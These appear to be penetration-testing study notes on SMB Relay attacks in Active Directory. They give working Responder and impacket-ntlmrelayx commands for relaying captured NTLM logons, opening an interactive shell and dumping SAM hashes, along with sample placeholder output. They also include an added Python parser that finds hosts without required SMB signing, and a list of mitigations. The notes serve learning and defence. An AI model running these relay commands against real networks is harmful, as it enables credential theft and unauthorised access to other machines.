Attacks - Active Directory Hacking

SMB Relay

What is SMB Relay?

SMB Relay is an attack where an attacker captures authentication attempts and relays them to another machine on the network. Instead of cracking the hash like in LLMNR Poisoning, the attacker forwards the authentication to access other systems.

How does it work?

  1. The attacker sets up a malicious SMB server to capture authentication attempts.
  2. A target machine attempts to authenticate to the attacker’s machine.
  3. Instead of storing the hash, the attacker immediately relays the authentication.
  4. The attacker forwards the authentication attempt to another target machine.
  5. If successful, the attacker gains access to the second target with the relayed credentials.
  6. The attacker can execute commands on the target system with the relayed user’s privileges.

Demo Time

To check if the SMB signing is disabled on a target machine, run:

nmap -sV -p445 --script=smb-security-mode <target-ip>

You should see something like this:

| smb-security-mode:
|   2.02:
|_   Message signing enabled but not required
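The nmap check above is easiest to act on when run against a whole subnet, so here is an added example (not part of the original notes or of nmap/Impacket) that parses nmap's normal output for both the smb-security-mode and smb2-security-mode script results and lists the hosts where signing is not required, i.e. the hosts that need the "required" setting from the Mitigation section. The host addresses and output are constructed samples.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of nmap normal output for three hosts (placeholder
# addresses, not a real scan). Two of them would accept a relayed logon.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.6
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.7
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# smb2-security-mode prints a sentence; smb-security-mode prints a key/value pair.
SMB2_RE = re.compile(r"Message signing (enabled and required|enabled but not required|disabled)", re.I)
SMB1_RE = re.compile(r"message_signing:\s*(required|supported|disabled)", re.I)
SMB2_MAP = {"enabled and required": "required", "enabled but not required": "not_required", "disabled": "disabled"}
SMB1_MAP = {"required": "required", "supported": "not_required", "disabled": "disabled"}

def parse_signing_status(nmap_output: str) -> Dict[str, str]:
    """Map each host that reported a signing mode to 'required', 'not_required' or 'disabled'.
    Hosts without a script result (port 445 closed, script did not run) are omitted."""
    status: Dict[str, str] = {}
    host: Optional[str] = None
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        if host is None:
            continue
        m = SMB2_RE.search(line)
        if m:
            status[host] = SMB2_MAP[m.group(1).lower()]
            continue
        m = SMB1_RE.search(line)
        if m:
            status[host] = SMB1_MAP[m.group(1).lower()]
    return status

def hosts_needing_required_signing(nmap_output: str) -> List[str]:
    """Hosts where signing is merely enabled or disabled: a relayed NTLM session is not rejected there."""
    return sorted(h for h, s in parse_signing_status(nmap_output).items() if s != "required")

if __name__ == "__main__":
    for h in hosts_needing_required_signing(SAMPLE_NMAP_OUTPUT):
        print(h)
```

Feed it the saved output of `nmap -sV -p445 --script=smb-security-mode,smb2-security-mode -oN scan.txt <subnet>` to get the list of machines to fix first.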

We’ll use Impacket’s ntlmrelayx.py to perform SMB Relay attacks. First, disable SMB and HTTP in Responder’s configuration file:

sudo nano /etc/responder/Responder.conf

Then set SMB and HTTP to Off.

Start Responder:

sudo responder -I eth0 -dwv

In another terminal, start ntlmrelayx:

sudo impacket-ntlmrelayx -tf targets.txt -smb2support

or for interactive mode:

sudo impacket-ntlmrelayx -tf targets.txt -smb2support -i

and to connect to the interactive shell ntlmrelayx opens on the target machine:

nc 127.0.0.1 <port-ntlmrelayx-is-listening-on>

This will start relaying authentication attempts to the targets specified in targets.txt. You should see dumped SAM hashes like this:

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:BLAH:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:BLAH:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:BLAH:::
WDAGUtilityAccount:504:BLAH:3

When a user attempts to access a non-existent share, their credentials will be relayed to the targets specified in targets.txt.

Note: SMB Relay works best against machines where SMB signing is disabled and the relayed user is a local administrator on the target machine.

Mitigation

To protect against SMB Relay attacks:

  1. Enable SMB Signing

    • Enable SMB Signing on all machines
    • Make it required, not just enabled
    • Configure through Group Policy
    • Requiring signing can break legacy apps that don’t support it and adds overhead to file copies.
  2. Authentication Security

    • Implement Least Privilege Principle
    • Use Strong Authentication Methods
    • Enable Multi-Factor Authentication
  3. System Hardening

    • Keep Systems Updated
    • Disable NTLM authentication on network through Group Policy > Computer Configuration > Administrative Templates > Network > Network Security > LAN Manager Authentication Level
    • Use Kerberos Authentication instead of NTLM
  4. Additional Measures

    • Regular Security Audits
    • Monitor for Suspicious Activities
    • Train Users on Security Awareness